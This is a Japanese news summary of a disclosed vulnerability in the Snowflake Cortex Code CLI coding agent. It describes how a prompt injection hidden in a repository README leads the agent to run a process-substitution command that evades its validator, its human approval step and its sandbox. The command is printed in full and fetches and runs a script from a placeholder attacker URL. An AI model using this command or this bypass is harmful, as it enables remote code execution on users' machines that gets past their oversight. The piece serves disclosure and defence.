Snowflake Cortex Code CLIの脆弱性により、サンドボックスからの脱出とマルウェアの実行が可能になりました
脆弱性の詳細
Snowflake Cortex Code CLIは、Claude CodeやOpenAIのCodexと同様に動作するコマンドラインコーディングエージェントで、SnowflakeでSQLを実行するための組み込み統合機能を備えています。リリースから2日後、Cortex Codeのコマンド検証システムに脆弱性が発見され、特別に構築された悪意のあるコマンドが、人間による承認ステップをトリガーすることなく任意のコマンドを実行し、それらのコマンドをCortex CLIのサンドボックスの外で実行することが可能になりました。
攻撃の連鎖
この攻撃は間接的なプロンプトインジェクションを介して機能します。ユーザーがCortexを開きサンドボックスを有効にした後、サードパーティのオープンソースコードベースに関するヘルプをCortexに求めます。信頼できないリポジトリのREADMEに隠されたプロンプトインジェクションにより、Cortexは危険なコマンドを実行する必要があると誤認させられます。
Cortexはプロセス置換式内のコマンドを検証できず、悪意のあるコマンドの未承認実行を許してしまいました:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))このコマンドは攻撃者のサーバーからスクリプトをダウンロードして実行します。このバイパスが機能した理由は以下の通りです:
- プロセス置換 <() 式内の安全でないコマンドは検証システムによって評価されなかった
- 完全なコマンドは「安全な」コマンド(この場合はcat)で始まっていた
- プロセス置換式内のコマンドは人間の承認をトリガーしなかった
サンドボックスバイパス
プロンプトインジェクションはまた、モデルを操作してサンドボックス外でのコマンド実行をトリガーするフラグを設定します。Cortexはデフォルトで、サンドボックス外でのコマンド実行をトリガーするフラグを設定でき、このインジェクションはこれを使用して悪意のあるコマンドがサンドボックスの外で実行されることを可能にします。
対策
Snowflakeのセキュリティチームはこの脆弱性を検証し対策を講じ、2026年2月28日にCortex Code CLIバージョン1.0.25で修正をリリースしました。Snowflakeの完全なアドバイザリはSnowflakeコミュニティサイトで入手可能です:https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
注:この攻撃連鎖は非サンドボックスユーザーにも適用されました。ドキュメントによると、OS+通常モードでは、すべてのコマンドがユーザーの承認を求めます。サンドボックスで実行されるコマンドにはネットワークおよびファイルアクセスの制限もあります。
📖 Read the full source: HN AI Agents
👀 See Also
エージェント・ドリフト:AIエージェント向けセキュリティ監視ツール
なし
AIチャットボットが実在の電話番号を漏洩:個人情報流出問題
Gemini、ChatGPT、Claude などのチャットボットが、トレーニングデータに含まれる個人情報(PII)により、実際の個人の電話番号を漏洩している。DeleteMe によると、AI関連のプライバシーリクエストが7ヶ月で400%増加した。
NanoClawのAIエージェント向けセキュリティモデル:コンテナ分離と最小限のコード
NanoClawは、各AIエージェントが独自の一時的なコンテナ内で非特権ユーザーアクセス、分離されたファイルシステム、明示的なマウント許可リストを使用して実行されるセキュリティアーキテクチャを実装しています。コードベースは意図的に最小限に保たれており、約1つのプロセスと少数のファイルのみで構成され、機能を再発明する代わりにAnthropicのAgent SDKに依存しています。
OpenClawの「常に許可」機能のセキュリティ脆弱性とより安全な代替案
OpenClawの「常に許可」承認機能は、今月2つのCVEの対象となり、ラッパーコマンドのバインドとシェルの行継続バイパスを通じて不正なコマンド実行を可能にしました。より深い問題は、この機能がユーザーにセキュリティプロンプトへの注意を払うのをやめるよう訓練してしまうことです。